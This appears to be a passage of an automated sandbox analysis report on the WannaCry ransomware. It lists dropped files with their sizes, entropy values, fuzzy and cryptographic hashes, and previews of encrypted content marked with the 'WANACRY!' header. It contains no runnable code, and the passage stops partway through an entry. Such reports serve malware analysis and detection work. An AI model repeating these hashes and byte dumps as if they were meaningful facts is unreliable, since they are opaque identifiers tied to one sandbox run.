                                                                              SSDEEP:24:Bmqxy9HUEXgBoZq2iy3R4hHvIeA6LBWZRJpFADS8US8LqSn:zy9HUMmY3aI6YDGDStV
                                                                              MD5:1B45BB0270BDCFCC369FA4029D379266
                                                                              SHA1:0D940BBD7E112FA9873C877C72BBA31E51D05565
                                                                              SHA-256:68A0C4AD6A5A4D028C6E5F09DFB23FF68B231C78847E879430DD412575F53199
                                                                              SHA-512:3784774BE340DF7973EBCB8FFEDD6315949E6EFAD50D79917BDCE72D25E09F668E94F936CC143EC0C98D468AB80B0DF04B331672FCDF419E01C0D6FEBCE15BAB
                                                                              Malicious:false
                                                                              Preview:....Xt..".AET...[<.l._.<......V.....Z.aR..K.D...z.qT.....U..oS..r.l..#Dp.w.a.v....._..c\;o...j......j..O...*.CZ.2....t...i.DP@.. .o.4L.6t.t8)..M..9^aQ?m.S,Xe.K..gx..Q..1.....^0...........k...{.C.!...4.....&.9N.LU..N.m]...8...#.$.:...A'.....9...U.C..N.........l<O....K..,.+PRd4A.".kg,..~..V...C...i....p.....-)2...0?P..;p0..+..p..a..t....r.e.M.c?5C<p7..O.<fn;9...2..=[.e........"......iD..y.m.._...A..}.u....D.u...@..(...|...^.g\W..I.u..k..?=eF.C.40..>(..u^...z....w.1...t&.6Z....B....G_M[..<$..E V...(..l.22'.d;he]SP.JX\.k...|././Y...>..D1.6.....<....Y...bF....z..$(D.B}8..^~....7.a{.~.W.>..C3.g....NW.S....&..}4.....PB...z5........f.r;.=..C.i.....pM?+..!.&..m..e.zh..M..6\....3#.`.e.4..y.. .C..m.#`....J9..F..<5.G&.>.......>.......>...5i+..-M..C...O...f~.....5A.(...Lq"~,P...60.2......[..6.......V.d..............@..n.=.{.4......./.Di4Q...Y.$....-g"(.A.d.He.aS..#.i.lmr.N.Ws.....m.a...D.j.apw*=..3....O.....#...vK.6...).+.y..bDL..*...q.+....7.$3.%+...k.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848285814639766
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk1QAWZksgcdKzuzQo/0UTiKamz5X+KumWq5jh70E2ox84kCa8JGzOGw1:bkTydS4t/1Temz5uNlEQE2WuCnGw1
                                                                              MD5:DC5C8B58493687FA942E0734273B2776
                                                                              SHA1:6702686DE2C3FFA210E1AC4D3B2A653ABA1866BB
                                                                              SHA-256:20742F625461709D347E8283B4B8DB13C8259A6544FA20A6F0D3168BC32EBAA7
                                                                              SHA-512:4C12BD641A7B2E5C98539B17A2DD9F1C5551724DD597134BC360D551828E1DBF35641E55E92C47683C33CF62951E80B5FAD84F10351C0467587C103BD4CD4227
                                                                              Malicious:false
                                                                              Preview:WANACRY!....$....$g......%......zl@WAu......O.2CF..I....Q0.@..C.#.^".$.L.@..*..j&/.Q.tJ..jD.=...J.3...O.X.HDiO..$..,...!Vc.......l..L..P.....f...q9...GB...GC.....z.y..m?.".p..+..>.pw~..@....e...rW....)H==.....n:s.C{...ZY...n.d.....B..+4S...iravm.3..:g..............@..n..5.....4...U..hL.@. ..&.$...K....~......A...J..'..^..].i..p...DD..$Y..W+.x.....$}..Y...,....j..g (..+...0XE..(Ig..7.wl\..........dC.F...~.+...=b@..B...:.%..y.-...`........^....F..XE.IO..Y.8oL..U.D.5B.......o[.......jaX6..Hv.<........1....(...J.....'..6.r..D.%.l..........m4....c....^./a...<>.R.l..}.:,.g.|.......[n.R6 v.....Y....97..0.......=.x..~.........7.34..Oa.V.B*..r.$w3W...%.....*l. ...fC....ra..fL...x.kk4[.<.y{.6h...k.*.q|o6......\L].3.g.....A..(. . ....A..9...A..&+..I..M..aL.NN.].+.D.=.q..4.HC.M.....ldk.0..a..q.I..."......f.b'.....^...#...5...,.....2..&.NWhv..}.N.....^.7N...........LI..MC..T5...hvr....."....U;.DL...#.p...O..r^p..V...<...]w.r<....7.....{"p.K.......!
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848285814639766
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk1QAWZksgcdKzuzQo/0UTiKamz5X+KumWq5jh70E2ox84kCa8JGzOGw1:bkTydS4t/1Temz5uNlEQE2WuCnGw1
                                                                              MD5:DC5C8B58493687FA942E0734273B2776
                                                                              SHA1:6702686DE2C3FFA210E1AC4D3B2A653ABA1866BB
                                                                              SHA-256:20742F625461709D347E8283B4B8DB13C8259A6544FA20A6F0D3168BC32EBAA7
                                                                              SHA-512:4C12BD641A7B2E5C98539B17A2DD9F1C5551724DD597134BC360D551828E1DBF35641E55E92C47683C33CF62951E80B5FAD84F10351C0467587C103BD4CD4227
                                                                              Malicious:false
                                                                              Preview:WANACRY!....$....$g......%......zl@WAu......O.2CF..I....Q0.@..C.#.^".$.L.@..*..j&/.Q.tJ..jD.=...J.3...O.X.HDiO..$..,...!Vc.......l..L..P.....f...q9...GB...GC.....z.y..m?.".p..+..>.pw~..@....e...rW....)H==.....n:s.C{...ZY...n.d.....B..+4S...iravm.3..:g..............@..n..5.....4...U..hL.@. ..&.$...K....~......A...J..'..^..].i..p...DD..$Y..W+.x.....$}..Y...,....j..g (..+...0XE..(Ig..7.wl\..........dC.F...~.+...=b@..B...:.%..y.-...`........^....F..XE.IO..Y.8oL..U.D.5B.......o[.......jaX6..Hv.<........1....(...J.....'..6.r..D.%.l..........m4....c....^./a...<>.R.l..}.:,.g.|.......[n.R6 v.....Y....97..0.......=.x..~.........7.34..Oa.V.B*..r.$w3W...%.....*l. ...fC....ra..fL...x.kk4[.<.y{.6h...k.*.q|o6......\L].3.g.....A..(. . ....A..9...A..&+..I..M..aL.NN.].+.D.=.q..4.HC.M.....ldk.0..a..q.I..."......f.b'.....^...#...5...,.....2..&.NWhv..}.N.....^.7N...........LI..MC..T5...hvr....."....U;.DL...#.p...O..r^p..V...<...]w.r<....7.....{"p.K.......!
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.785106458347604
                                                                              Encrypted:false
                                                                              SSDEEP:24:+v9H/JT+nNvRDG6muwOIKlwKmwlnK2SyO1Jf4Ap5tfGYbw5mg:+v+nNJDJVIcXnRuJQApDfTbwgg
                                                                              MD5:6CE86D44EB6E627F8035FD2B0CD7DDF6
                                                                              SHA1:04DF1985BB38757CFD526162CCF630E3E375140A
                                                                              SHA-256:0AA6CD7ED348F0A9CFF2CF0FDB4D272D6B45497925439E4BB6898A5A87A1B8A6
                                                                              SHA-512:8C1D56ACA87523465C6CA23523B58955862BF8C695CF7455D173E5555D6DF8E50095A082E9465FB2F106446296921DB508A828164A8AF0EF56DFD07FF3AB3B4E
                                                                              Malicious:false
                                                                              Preview:........+8....a.T..l6m6..Z7..\i..-...O..../.......A...!..=...*&\...yS.%..5..x......[.c......5..s.\s..'V.....K..Z...Qia...-...d.p.j6..!F...!.-.;..Jg..;.6A9.O..=...gk!...<V.. m..t.;...G9..9.. 6..B.O!..t.j.....[...j....~. #.u.6X.s...w.iv. .AC`.0A..z..FH.X..] W...89kA..(...~gp8E.kN..o..].Kst....K...`d|.PJ M.%....z..,H)......Rp.R.._...k.....X..qs......~.A.q[. ..p.*.B.4....m.....H....&..{......D..kI.8'..~]_...p}o.z..t<.8.O..6.Z.J7}2........b.qS..$.NO:.$wlY6c..GV.._.L;LJ.=.m..z.e..Ww.h-.]&d. Z. 2.+..Yv..H.d.O....%T.0H.r.r..y.x...r....?.k..8p'}..V.F..<#..BA4.2.Q...l~8...I.r.$.. ?.E.H;...iI8....Y...xc..9o;:0..ns....]@o.:..[.\x....5....=.1..*...f.l.n.G.....}../.r.'d..{0..rbH......N.>gc.........r.uz..e..o..!..L......M..a..T.8f.#'...Qw..2U...*..j.L'.=@..>&*.%........\Y7w..........ek.j.d.!....UA<..F.>.:?...>nD/7......oBi..F. u0...JL.96}[..=.* . ....P.._#...B..p.[.u.2.(...p.....0...8...I|q......s.!.$...5R.3.H.kU~a.-......1..\<.Y|.=.To....B...59-.&
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.854308915997889
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk39zyiFWY3twGPhL/Rms9lD5CAqbuMNLOSub/eRa0NxWqmgsaSDW9/Uz:bkNzpUUfdR9ZBUpNL3ub/YPNxRZu
                                                                              MD5:F17D2B8C3B5321A4034FB64B383BFA0B
                                                                              SHA1:642A288A3F58034473F5E804DC01B65CAD63000B
                                                                              SHA-256:34CEE657703D438A8C273C071B12E3C4946E61A97C99008AF6412A7AD588BCE7
                                                                              SHA-512:B86CB8305609F0BC0C24AEF759D29D0590C172CF671E7A0193912B71E5DE1B202DD92D7A353657C48712AD7FFC5AA543DC66A68C10C3B62FCCE3E4CF21A47CC1
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....e.e..X..+.nG...o..g.d.,3..'.Mc..h..[...G....O.M<....[....;s*.....7....LpfH.B..[.b...V.k>'....#...S.l..c.Y.,...T.T.k.....{...ptj.Omd..Ud....\.I.$I.+.%7..Gd...!f..h..u..M.#...4r..#....\..w.}...q...,.3M.....R.*..m..&E..}%..`.O"j9th....YS[wk.v.............'..b.C...g$qD..R.~..;?......}..9....i.fF".....=...._A.Y(.WW:}..S.r.....h....'...r...7...]F..'.6D..,.mo.<.\.....+.l]r..zi........H..:E.FP.<....j..CK...j`.......F,|.Y...A...).9.v.......}.D.>......|H[..L..8W.6..h...Dt.^.z'[.C...5.8..0../'...a.:|.AjQ......\..6},.G.dB...2|..k.&e.+#.)/.M'.e....yhG:.S...s4.j_DU.}....}.....u.........d..b1..!.E.4..@....o.......)/39.O.W....w}.3O.Zmq.1.....U...I..q.|...N.....Q..Wg.V.*.~....:a|......'.X'M'....a..D.u........v...V.....v.r.....aA.7ej.......x....5.Z...Mn9.4.N.+..6!..]3...`..'1Z..i...?zw-..5x....-....).F./..$A9!2K...7...u.+.hy.k..}.....C..gsZ..L..|2f..[....K.....]..IxZ..<..P.......E.Zy1n.HH..@..`4....d6G..s.n.(..I..8.`...r9<tz./..n..\..L
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.854308915997889
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk39zyiFWY3twGPhL/Rms9lD5CAqbuMNLOSub/eRa0NxWqmgsaSDW9/Uz:bkNzpUUfdR9ZBUpNL3ub/YPNxRZu
                                                                              MD5:F17D2B8C3B5321A4034FB64B383BFA0B
                                                                              SHA1:642A288A3F58034473F5E804DC01B65CAD63000B
                                                                              SHA-256:34CEE657703D438A8C273C071B12E3C4946E61A97C99008AF6412A7AD588BCE7
                                                                              SHA-512:B86CB8305609F0BC0C24AEF759D29D0590C172CF671E7A0193912B71E5DE1B202DD92D7A353657C48712AD7FFC5AA543DC66A68C10C3B62FCCE3E4CF21A47CC1
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....e.e..X..+.nG...o..g.d.,3..'.Mc..h..[...G....O.M<....[....;s*.....7....LpfH.B..[.b...V.k>'....#...S.l..c.Y.,...T.T.k.....{...ptj.Omd..Ud....\.I.$I.+.%7..Gd...!f..h..u..M.#...4r..#....\..w.}...q...,.3M.....R.*..m..&E..}%..`.O"j9th....YS[wk.v.............'..b.C...g$qD..R.~..;?......}..9....i.fF".....=...._A.Y(.WW:}..S.r.....h....'...r...7...]F..'.6D..,.mo.<.\.....+.l]r..zi........H..:E.FP.<....j..CK...j`.......F,|.Y...A...).9.v.......}.D.>......|H[..L..8W.6..h...Dt.^.z'[.C...5.8..0../'...a.:|.AjQ......\..6},.G.dB...2|..k.&e.+#.)/.M'.e....yhG:.S...s4.j_DU.}....}.....u.........d..b1..!.E.4..@....o.......)/39.O.W....w}.3O.Zmq.1.....U...I..q.|...N.....Q..Wg.V.*.~....:a|......'.X'M'....a..D.u........v...V.....v.r.....aA.7ej.......x....5.Z...Mn9.4.N.+..6!..]3...`..'1Z..i...?zw-..5x....-....).F./..$A9!2K...7...u.+.hy.k..}.....C..gsZ..L..|2f..[....K.....]..IxZ..<..P.......E.Zy1n.HH..@..`4....d6G..s.n.(..I..8.`...r9<tz./..n..\..L
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.818852852187806
                                                                              Encrypted:false
                                                                              SSDEEP:24:t/IZSi0lKOGnwvBb2d9kZ/VjbzRQz4ldUW5Wdr3pY:gSbwOUoZ/VjXRQklqWsdrpY
                                                                              MD5:C22863544CC67C3D3620253BF0D937FC
                                                                              SHA1:4941A571168EE6C8D0AFED5476BE889096A9B3FC
                                                                              SHA-256:503CF8B9B37B971CC6F87703F429792D5D0BC0400D2A04B2E6EAAD342BBE6BCE
                                                                              SHA-512:D3A32CEDB22F7BA3BE3D609406746C46E8CD321509A1D0A06AC7C272D88B0ED34D26D0288C8B9C72A18AECC7157F0E7DC4587104A09A6FDF0A35F0E0FEFD5AA1
                                                                              Malicious:false
                                                                              Preview:.MG..{;.r..h..w.C..qR....E./2.h.0......3.g<..S;Sl..p..lT..T...t+.!..h.\.....x...A..`..$..0...E.....^.6`...9....~.*..S/.k........u....uyq...........T].>.........@ NX/.bWl..n..p..5.%...6.Q.T...6..........|...#.:..E.;~.~..J.kC...VjJs.G..j.a...r..*.....ZP...4.U3.@.=..........UKSE.sH...s1 ....=.. "~J.p|.(..>=9.......?.N.x.....5........n.........N..1..%..2W../.20.O.>gm(..T~...9..._D.[.a'....q..;.......$...... 'ig6...O....?.;..z...k.8.]..C.L. .L..3../.^|b..C.Z. ..X........hT?..hz.....!!...v.dP.(.....ITX..t.1.E.....3.d..R.?.V....`tr,"..@jk5....*,..k.;..y..l........Y.....d.m..6..-...[..$9I.u."(c4._...S&.;..{.6..a|.2.qr%...{.K.. W...[.(..#.W...WOf.Sbl>....4.&<1.i....l.....3...q...B....g.....ZI.X.i..3.......S1A...95....E...=W........\...^j...N.h...r'.B.^..m....b|.X..2..cV....+YB.1"18:...A.6.+......d..e@;i1.97.......i.u.O....c7(...v3..?S...B@.3\q.O...$..v....*.Z.am...n.. .(.h.xYV.s[b..[.VZ?......._g[.L..OD.-DG:Pn.. ..p.]jA.ti.%.{2<.`U....b..Y.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.843018092600599
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkhMiCmbZOfBvv9DGA8ufL1wNFJuZvIU9b4B8cWLBbdSvohhxbC1q:bkhfBwf5MvuAqvf9b4ScWLBbdSgnME
                                                                              MD5:9C1155F9FD7E13DFF272C9E5405D1A01
                                                                              SHA1:65FC3353306A82FF93C2F64B4989190A12060FAE
                                                                              SHA-256:72FEAF9CC6F4405A074D1557FE9DC87A2A9EA89B6B78AF6A58F9FA82BA3380FD
                                                                              SHA-512:8C00CF7F509858659AFD895C3AC5C18F5E4C69A33795719A5D8B60AD5991D87072D4C17E90E631586104DE3B30C3DFB144343864B5D8C03A921BCA91D0980ABE
                                                                              Malicious:false
                                                                              Preview:WANACRY!......MV....oQ..,..^+...C...|.&B.&.......F.u[{|....p..t.......g]?]...P..A.y.y.k.x.:b^..D}.K'..`J.._.n.s...b%r.".m.......=...]..:.S.T.mB.z...3z..n8...@..%.....a.c<_..a.......1x...&..X ..8.uIw.....bg.z....x...U.O.$a..!...u. ...#...>.d@A...]S....g..............q]........~'.E..x....P.f....P.b.@.(.O.I8k?}.....)?.18Tj.~8.....tv.....t....<...79......^..j.T.k.&....X..|z.;<..).&59..A..>..k..r$..N...~.iS..J..sh..:pI....E"...^Y..p.*=.....Y.~..>...6.}J........7..s.&.N.="/...4^.z-S'.zBB......p....^.FR...!....I..q@.<._.....Q..M. JO.B.cr....e.+.e....D2E...2xP@.Mwx=......y........V .o&..[5....>J...y.$.....3.2p...G.......k.v3K....).wJ.U2.,.fM-..].Fn;.)D.KS....?8..J....AVc..eZ.wW.;.T..t._6....`#g.M+y.Z.)%.#i..P....=...!.7.!.... ..,...&P..7T.......:C1..%l.....d..;B.5.wf.....s...>.<.Y.c.grO..2S.b..`z.....z....|......O(*.x....}.8-.<.W.^...0>.J.6....GE.J-.g..#..-_.,..c*iH.}D.....6.(.!........!.....D..........'..I.....@D.C.DS:.Qf~...){...f.....vR.c.P....H.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.843018092600599
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkhMiCmbZOfBvv9DGA8ufL1wNFJuZvIU9b4B8cWLBbdSvohhxbC1q:bkhfBwf5MvuAqvf9b4ScWLBbdSgnME
                                                                              MD5:9C1155F9FD7E13DFF272C9E5405D1A01
                                                                              SHA1:65FC3353306A82FF93C2F64B4989190A12060FAE
                                                                              SHA-256:72FEAF9CC6F4405A074D1557FE9DC87A2A9EA89B6B78AF6A58F9FA82BA3380FD
                                                                              SHA-512:8C00CF7F509858659AFD895C3AC5C18F5E4C69A33795719A5D8B60AD5991D87072D4C17E90E631586104DE3B30C3DFB144343864B5D8C03A921BCA91D0980ABE
                                                                              Malicious:false
                                                                              Preview:WANACRY!......MV....oQ..,..^+...C...|.&B.&.......F.u[{|....p..t.......g]?]...P..A.y.y.k.x.:b^..D}.K'..`J.._.n.s...b%r.".m.......=...]..:.S.T.mB.z...3z..n8...@..%.....a.c<_..a.......1x...&..X ..8.uIw.....bg.z....x...U.O.$a..!...u. ...#...>.d@A...]S....g..............q]........~'.E..x....P.f....P.b.@.(.O.I8k?}.....)?.18Tj.~8.....tv.....t....<...79......^..j.T.k.&....X..|z.;<..).&59..A..>..k..r$..N...~.iS..J..sh..:pI....E"...^Y..p.*=.....Y.~..>...6.}J........7..s.&.N.="/...4^.z-S'.zBB......p....^.FR...!....I..q@.<._.....Q..M. JO.B.cr....e.+.e....D2E...2xP@.Mwx=......y........V .o&..[5....>J...y.$.....3.2p...G.......k.v3K....).wJ.U2.,.fM-..].Fn;.)D.KS....?8..J....AVc..eZ.wW.;.T..t._6....`#g.M+y.Z.)%.#i..P....=...!.7.!.... ..,...&P..7T.......:C1..%l.....d..;B.5.wf.....s...>.<.Y.c.grO..2S.b..`z.....z....|......O(*.x....}.8-.<.W.^...0>.J.6....GE.J-.g..#..-_.,..c*iH.}D.....6.(.!........!.....D..........'..I.....@D.C.DS:.Qf~...){...f.....vR.c.P....H.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.81555875200007
                                                                              Encrypted:false
                                                                              SSDEEP:24:pPkiuNhz7RELwxW/hqnyUZBPZ8QoxXqeOo0he6sT7byNS6:YXlJQSyEJyQoVq2Ke6v
                                                                              MD5:2EDB465551157BB030AEF18D58337B3C
                                                                              SHA1:8EA2DF29DF5118683AA3CCE8DEF3B40B8185E3FD
                                                                              SHA-256:0B3A13C1B638DC6B042F8C20BD8209E2E08B6A952A962A5AE75CB6F37509E9BA
                                                                              SHA-512:34D7766DA68C4DB033628839BF9D74A8F34B354E094C1B2C306FF81904EE34C3B8C0C70CAEBF88A9B982CACE5344A2C5E90D3A02FD25C091E9C0B4C5666ACE6D
                                                                              Malicious:false
                                                                              Preview:Ps.<.".X.....w.dT..y....[K......H..A.....|..NG*.O3.@...........j.h.T@*...................(0....,L......h...........g....oB/{....F....L.#.;D..c...5......:#..G\m$.#.J....l,.=,(..`j...N.........)*..k.N8Fp..D.[7..s.4...h.....c._.B......&).......}...wR...].......)h.6L...*..c....@1.Pz.......U....xZD....P..iT-,.b.../..f$..$.k.1q..YDO.6....B2.X....y.....m.....6..Y..~...~8..UNX............c.u......^.j........Z.V.|Jk...;..8b.v^...+._.0..&..S.pc.*..7.F..^......F.@Q8....]._.Fq.Q..7.KY.+'.2.b.......b#..}Ht.J. .l..P.....+.n.?f.?..&....,..z.....^... .......`..).X.M...S..gj........eb.$........y....c.....<.m.<.../..*.bt*z.....K.eA.....z...V?..mX.4W..S:.fL.z.y..>..ko.../..&z..V-_.i....2.j.....R-.g...g...t.rI..i5Z...@.....LXp../@...g.'(.&..,5K..h..6~.m>.........D.>......... P....?)a....%.5`....u<.C.e..j..g$...=.'+...6.uGC\.w....5.ky...fe...L../4.6g...}.o.*........q75N>U...#u..W.K:5\...Wb.^..z.PI...",7..7..=..ax.n....6..@.2Y..e.l. r.HW.b_..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8446143353182265
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkVj98MtAcj0hdjO2lIcmMJ0v4Wg77Q9ioYr3ZaFkBm6PFq2kR/hwzCoaqy2:bkVSMtAS0hd63RMmAWY74ilZCkDypwOG
                                                                              MD5:B7D29CD3913FD3FAD382AAD8CA2CAF08
                                                                              SHA1:486135C77CC75524E772DF418988B3B2F236119A
                                                                              SHA-256:92C4B99F7F812C20B1CB9BA434CF6A329E31A939364E8667D4B371CE498BC528
                                                                              SHA-512:F56B9AF68FBC2A8AF61BEBDA3CDE7CD0E078AC9A584EAFF699A6282FF38824FB914C8123BFA9498E6F0CDEEC7E8098B4E90FB94026B0099F1B5C956C31273953
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....2I...ER.ZRB...x..uW.-...Ij.J..'2.?.K.D6...&.z.;..5..p.....^.v.</...P..'....f..^f.3......y.x02.;S.;..{-d;B........7.h....SG..7.(n.`........9/K..K.>....U.$.3\........G.iZw#......T.E>..../.OB....o............#2..s....q"..k.>...".vws.B.......o............w...wI..|...lW:.{;..H..xs....~..C+......9......Y..N.~{."@..ge.....r....Yk....K2.. yQ.q..R.t...oZ.T./W[.+g.86f..L..n0d[.[..C.L~..rt.b.P..K.K...L...Q\.!....4"..F.c..l..7N.G..~'u..i.!#...... .q..#.......C..%.;[.t..{....j....JW..5tk.....$.41.JF.......;p..hCs..0..f.....n.....*..poz. -e.|...`.oh_..E.'cW0.Wk1..`..B....p...W..$...:...(...f$g...........pn-.Z...g..'-..@..:.].G,..n.....f.$.5.{.`~Y.|mG.G. .`...q..c...j?..1.3k!.<?....J.ZD.&7....d.8..=]6a.Y.....-o.?..b.....Mu&{.\...P.$Q..F..)-Q..C.i.4q.\..k$a ...z..?.n.w}.J_i...B-Kc..x.A.*.u.i../g..q.(.h.....ye....{..2..o-......EB.7j.&H4.i.6W-.O......l..J.L.*E.(...u........3(..N.:......g.X..}..{`../.w.x..#vG..{.......D`I...K.....j.<W....S..&
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8446143353182265
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkVj98MtAcj0hdjO2lIcmMJ0v4Wg77Q9ioYr3ZaFkBm6PFq2kR/hwzCoaqy2:bkVSMtAS0hd63RMmAWY74ilZCkDypwOG
                                                                              MD5:B7D29CD3913FD3FAD382AAD8CA2CAF08
                                                                              SHA1:486135C77CC75524E772DF418988B3B2F236119A
                                                                              SHA-256:92C4B99F7F812C20B1CB9BA434CF6A329E31A939364E8667D4B371CE498BC528
                                                                              SHA-512:F56B9AF68FBC2A8AF61BEBDA3CDE7CD0E078AC9A584EAFF699A6282FF38824FB914C8123BFA9498E6F0CDEEC7E8098B4E90FB94026B0099F1B5C956C31273953
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....2I...ER.ZRB...x..uW.-...Ij.J..'2.?.K.D6...&.z.;..5..p.....^.v.</...P..'....f..^f.3......y.x02.;S.;..{-d;B........7.h....SG..7.(n.`........9/K..K.>....U.$.3\........G.iZw#......T.E>..../.OB....o............#2..s....q"..k.>...".vws.B.......o............w...wI..|...lW:.{;..H..xs....~..C+......9......Y..N.~{."@..ge.....r....Yk....K2.. yQ.q..R.t...oZ.T./W[.+g.86f..L..n0d[.[..C.L~..rt.b.P..K.K...L...Q\.!....4"..F.c..l..7N.G..~'u..i.!#...... .q..#.......C..%.;[.t..{....j....JW..5tk.....$.41.JF.......;p..hCs..0..f.....n.....*..poz. -e.|...`.oh_..E.'cW0.Wk1..`..B....p...W..$...:...(...f$g...........pn-.Z...g..'-..@..:.].G,..n.....f.$.5.{.`~Y.|mG.G. .`...q..c...j?..1.3k!.<?....J.ZD.&7....d.8..=]6a.Y.....-o.?..b.....Mu&{.\...P.$Q..F..)-Q..C.i.4q.\..k$a ...z..?.n.w}.J_i...B-Kc..x.A.*.u.i../g..q.(.h.....ye....{..2..o-......EB.7j.&H4.i.6W-.O......l..J.L.*E.(...u........3(..N.:......g.X..}..{`../.w.x..#vG..{.......D`I...K.....j.<W....S..&
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.7942371145515805
                                                                              Encrypted:false
                                                                              SSDEEP:24:EVGOtnXl06XCTt5mJuZw4qEZjgXSCwO3MPWAGO5g2iJhAHs:EJ1/STjmJf5qgLwO8OKOJhAHs
                                                                              MD5:E943B642819F70E37405D8CD61A6FCE9
                                                                              SHA1:032FD100102566E7B45832E6F3485B6943F95668
                                                                              SHA-256:767D05D37D51BEBD28565A38D94CAE95720D4587FB614768DEEE03DA3250641B
                                                                              SHA-512:AFF85C92317251A82D92A7B9237C91C63D04C767B0DFD96E0D7FE0CC3831833997525ED45AED5D02BCD457595D29B0A9017D381859FF8FA987CDC5F6E98EFAF8
                                                                              Malicious:false
                                                                              Preview:q....4..Wy$O./PM.........0..;.`.....~.^..pv....2Wf.RC...e.S#j.)...........ij..k.d....u.q.i.:........Q...t.l.W4{8.....}.o...s....@Gq...6.,P0ck.G....5..V.o.\...*......@u..D.B.G.JWa.-.*../..x..8...<.>w.@....T...Tr...|.i.../W|@..#..W).......$.'F{..c2........L}6....?Z.....?<..m....9......oO.xt3.j...7...J./c6...L.j..0.=l.....CR_....|.V.Ic.<...;,..a...~$.Ph....&{.Q.._...Wb..i..z,.C..d.u.v..$Y.Y..P....wC..p;h..._g.x..)...0..O.....b.n>tC.T.N...4=.E....^;.....S..>s.!+......I....`.X....y.Pw...L..)pph...,......A0...Z..^*Re..PS...y.:y..0..-.f.3..^3.......0qd............]X.Z@...Y`%.....~..j....'s3U1..!..../!..4y_....~.V..d..q..B^.8AZ..j..G;..j..7.=u..K.h3.I_jp.x......!y.......c<.)s.d.@Ke....`.L.c.m..%...G...$.gN.#...R...+H."\.Lx_ld..tX{.C..=U.9Z. .....[..;..#...(.^8..m..uD..e...Jk$..~...p..A....1w...U...HS...zC......}%.$...L.<....L......g.......Gz.!9P..%..$(....a.o....t.].=R[....H.d.y.j.)......)..J-2.@(5....ha..Zl....u........?..ja.,o.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8404778662985475
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkYZxCbzEy7dZcuRUrYEOOJEEnLqjenF8xvPYHutm0z9cqW+amS:bkokEw5VOJEESeGxvPVncqq
                                                                              MD5:860E8CFE530B200BD2B1098A7A4176EF
                                                                              SHA1:E2559E8C9654CA1DB9C6A5D53C39A5AC896D5F14
                                                                              SHA-256:8FBFFCC862F5D887B4446AAF661E65E1EF64732D2FD9715011DCFF347DB4CB5C
                                                                              SHA-512:AE6CEB789562BCDC5AB1CFBF0137482E6E5DEC78DDAFD763464C2D80DE88553784812F6CA967AEAA9911FAAB79CA4C8FB9015856EB77967FB5DDE2FA40891938
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....fA.K.....%~.K+.?.4!..G.....g..)..[4.?..B......x.d.b..g..U....?c9.{..OQ+..e!...Z....h......*(...7...f..s.xg..E.Et...J.]....v..i.....V.9...."!....P.....Z..';F~..bX....".y....%......(.#...L2(..:.V4...T....t...WVz...(.,..-.H....B..x.....!if.L.1...............mD..2/..:4..>....Sw..4^M...UD...d...........k"lxT.5k.{..OXQT.9..t....j...y....|.n*oKm'.......eW..Uy.5..i...f.5..0u....R7nfOS.S..A.n".|I....l.......\......x...H....[..(E...j,#..H..a%a....SM..".....V.6b.1.......u...Oa.;.ZHk.N.i.#jfmH.%Fn.cY....,d.w.9a...=.....>..y.kX.w.v._|........(..8.@........v'......g>..Kn.....M.1.O...H......;....Y...PI...^..4gZ..2dF,....C...V.......dF...?..e..e.{. ..aKZO^...s..b....z....m\=..f&..#...G.R.H........4...w....T2....nw.fHoM.@u..W[].L.;.H.CcB.Q..._....e$.;nI.....!G./:ix..].L......b..-............<....Cb...p....O...0>.........Y...R).D....7.../p..,.:H..>.5:.W..l..(.kF..F.......&.wP....%*0. *.4[^.=h..5(4.?./B...Q.U.?S..:.s..Pp.|........t
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8404778662985475
                                                                              Encrypted:false
